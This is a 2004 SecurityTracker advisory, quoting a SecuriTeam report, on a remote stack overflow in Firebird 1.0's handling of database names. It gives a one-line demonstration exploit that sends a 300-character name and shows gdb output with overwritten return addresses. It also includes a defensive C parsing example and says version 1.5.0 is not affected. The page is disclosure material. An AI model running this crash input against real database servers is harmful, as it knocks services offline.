SecurityTracker.com
Category:   Application (Database)  >   Firebird
Vendors:   firebird.sourceforge.net
Firebird Database Can Be Crashed By Remote Users With Specially Crafted Database Name
SecurityTracker Alert ID:  1010354
SecurityTracker URL:  http://securitytracker.com/id/1010354
CVE Reference:   GENERIC-MAP-NOMATCH
Updated:  Jun 3 2004
Original Entry Date:  Jun 1 2004
Impact:   Denial of service via network
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): 1.0
Description:   A vulnerability was reported in the Firebird database in the processing of database names. A remote user can cause the target server to crash.

SecuriTeam reported that a remote user can connect to the database and send a specially crafted database name to cause the target database service to crash.

A demonstration exploit is provided:

gsec -database 192.168.1.52:`perl -e'print ("A"x300)'` -user whenever -password whatever

Noam Rathaus of SecuriTeam is credited with discovering this flaw.

Impact:   A remote user can cause the database service to crash.
Solution:   The report indicates that version 1.5.0 is not vulnerable.
Vendor URL:  firebird.sourceforge.net/
Cause:   Exception handling error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.
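
The SecuriTeam report attributes the crash to an over-long database name overwriting the server's stack. As an added illustration (not Firebird's code and not part of the original advisory), this is the length-checked parsing a server can apply to a received `host:path` database specification before copying it into fixed-size buffers; the buffer sizes, type names and function names are assumptions made for the example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed limits for this illustration; not Firebird's real values. */
#define HOST_MAX 64
#define DBPATH_MAX 256
enum spec_status { SPEC_OK, SPEC_BAD_FORMAT, SPEC_HOST_TOO_LONG, SPEC_PATH_TOO_LONG };
struct db_spec { char host[HOST_MAX]; char path[DBPATH_MAX]; };

/* Split a received "host:path" of known length into fixed-size buffers. Every
 * length is checked before any copy; over-long input is rejected, not truncated. */
enum spec_status parse_db_spec(const char *spec, size_t len, struct db_spec *out)
{
    const char *sep;
    size_t host_len, path_len;
    if (spec == NULL || out == NULL || memchr(spec, '\0', len) != NULL)
        return SPEC_BAD_FORMAT;          /* embedded NUL in wire data */
    sep = memchr(spec, ':', len);
    if (sep == NULL || sep == spec || sep + 1 == spec + len)
        return SPEC_BAD_FORMAT;          /* no separator, empty host or path */
    host_len = (size_t)(sep - spec);
    path_len = len - host_len - 1;
    if (host_len >= sizeof out->host)
        return SPEC_HOST_TOO_LONG;
    if (path_len >= sizeof out->path)
        return SPEC_PATH_TOO_LONG;
    memset(out, 0, sizeof *out);         /* guarantees NUL termination */
    memcpy(out->host, spec, host_len);
    memcpy(out->path, sep + 1, path_len);
    return SPEC_OK;
}

/* Constructed sample input: the page's host followed by n filler bytes. */
enum spec_status check_name_of_length(size_t n)
{
    static char buf[1024];
    struct db_spec out;
    size_t prefix = (size_t)snprintf(buf, sizeof buf, "192.168.1.52:");
    if (n > sizeof buf - prefix)
        return SPEC_BAD_FORMAT;
    memset(buf + prefix, 'A', n);
    return parse_db_spec(buf, prefix + n, &out);
}

int main(void)
{
    printf("255 -> %d, 300 -> %d\n", (int)check_name_of_length(255), (int)check_name_of_length(300));
    return 0;
}
```

Rejecting the request outright, rather than truncating the name, also keeps the server from opening a different database than the one the client named.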


 Source Message Contents

Subject:  Firebird Database Remote Database Name Overflow


 Firebird Database Remote Database Name Overflow
------------------------------------------------------------------------

Article reference:
http://www.securiteam.com/unixfocus/5AP0P0UCUO.html


SUMMARY

Firebird <http://firebird.sourceforge.net> is "a relational database offering 
many ANSI SQL-92 features that runs on Linux, Windows, and a variety of Unix 
platforms. Firebird offers excellent concurrency, high performance, and 
powerful language support for stored procedures and triggers. It has been 
used in production systems, under a variety of names since 1981".

A vulnerability in Firebird Database's way of handling database names allows 
an unauthenticated user to cause the server to crash, and to overwrite a critical 
section of the stack used by the database.

DETAILS

Vulnerable Systems:
* Firebird Database version 1.0 (1.0.2-2.1) - Debian unstable

Immune Systems:
* Firebird Database version 1.5.0 (others are presumed to be immune as well)


By issuing:
gsec -database 192.168.1.52:`perl -e'print ("A"x300)'` -user whenever 
-password whatever

On a remote server, you can see that:
gdb /usr/lib/firebird/bin/ibserver
GNU gdb 6.1-debian Copyright 2004 Free Software Foundation, Inc. GDB is 
free software, covered by the GNU General Public
License, and you are welcome to change it and/or distribute copies of it 
under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for 
details.
This GDB was configured as "i386-linux"...(no debugging symbols 
found)...Using host libthread_db library
"/lib/tls/libthread_db.so.1".

(gdb) r
Starting program: /usr/lib/firebird/bin/ibserver
(no debugging symbols found)...(no debugging symbols
found)...(no debugging symbols found)...(no debugging
symbols found)...(no debugging symbols found)...[Thread
debugging using libthread_db enabled]
[New Thread 1075462272 (LWP 31389)]
(no debugging symbols found)...(no debugging symbols
found)...(no debugging symbols found)...(no debugging
symbols found)...(no debugging symbols found)...[New
Thread 1092549552 (LWP 31392)]
[New Thread 1100938160 (LWP 31393)]
[Thread 1100938160 (LWP 31393) exited]
[Thread 1092549552 (LWP 31392) exited]
[New Thread 1092549552 (LWP 31396)]

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1092549552 (LWP 31396)]
0x08132223 in ERR_post ()


(gdb) bt
#0  0x08132223 in ERR_post ()
#1  0x080942ac in THD_wlck_unlock ()
#2  0x41414141 in ?? ()
#3  0x41414141 in ?? ()
#4  0x41414141 in ?? ()
#5  0x41414141 in ?? ()
#6  0x41414141 in ?? ()
#7  0x41414141 in ?? ()
#8  0x00414141 in ?? ()
#9  0x0000012c in ?? ()
..

Solution:
Debian is currently not maintaining this version of the product, so it is 
recommended that you use a source code based installation.


ADDITIONAL INFORMATION

The information has been provided by Noam Rathaus 
<mailto:expert@securiteam.com>.


Regards, 
Aviram Jenik
Beyond Security Ltd.

http://www.BeyondSecurity.com
http://www.SecuriTeam.com


DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages. 

 
 



Copyright 2021, SecurityGlobal.net LLC